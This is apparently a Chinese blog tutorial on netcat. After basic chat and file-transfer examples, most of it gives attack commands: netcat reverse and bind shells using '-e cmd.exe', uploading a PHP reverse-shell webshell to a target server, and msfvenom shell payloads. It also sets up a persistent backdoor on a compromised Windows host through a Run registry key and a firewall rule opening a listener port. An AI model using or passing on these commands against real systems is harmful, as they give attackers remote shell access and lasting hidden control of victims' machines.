赞
踩
1. 基本使用
1.1 聊天工具服务端
nc -lvp 5678
客户端
nc 192.168.1.15 5678
1.2 文件传输接收端
nc -lvp 5555 > a.zip
发送端
nc 192.168.1.5 5678 < cms.zip
1.3 反向后门监听端
nc -lvp 5678
控制端
nc 192.168.1.5 5678 -e cmd.exe
2. 综合使用
2.1 结合php反向后门
控制端启动监听nc -lvp 1234
编辑php反弹shell后门,vi /usr/share/webshells/php/php-reverse-shell.php,修改 $ip和 $port 为控制端的地址和端口 将 php-reverse-shell.php 文件上传至目标服务器中,通过浏览器触发 php-reverse-shell.php 文件路径,在nc终端中的到反弹shell
2.2 结合msfvenom使用windows/shell_hidden_bind_tcp
msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=4444 –f exe > root.exe
nc 192.168.0.103 4444
windows/shell_reverse_tcp
msfvenom –p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 –f exe > root.exe
nc -lvp 8888
2.3 做持久化后门使用
将nc.exe上传至目标服务器中指定目录msf > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
切换到目标cmd环境
msf > shell
# 添加自启动注册表项
C:\WINDOWS> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
添加nc出入站防火墙规则
C:\WINDOWS> netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
检查nc防火墙是否已经开放
C:\WINDOWS> netsh firewall show portopening
重启目标电脑,使用nc连接
C:\WINDOWS> nc -nv 192.168.0.101 4445
版权属于:逍遥子大表哥
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。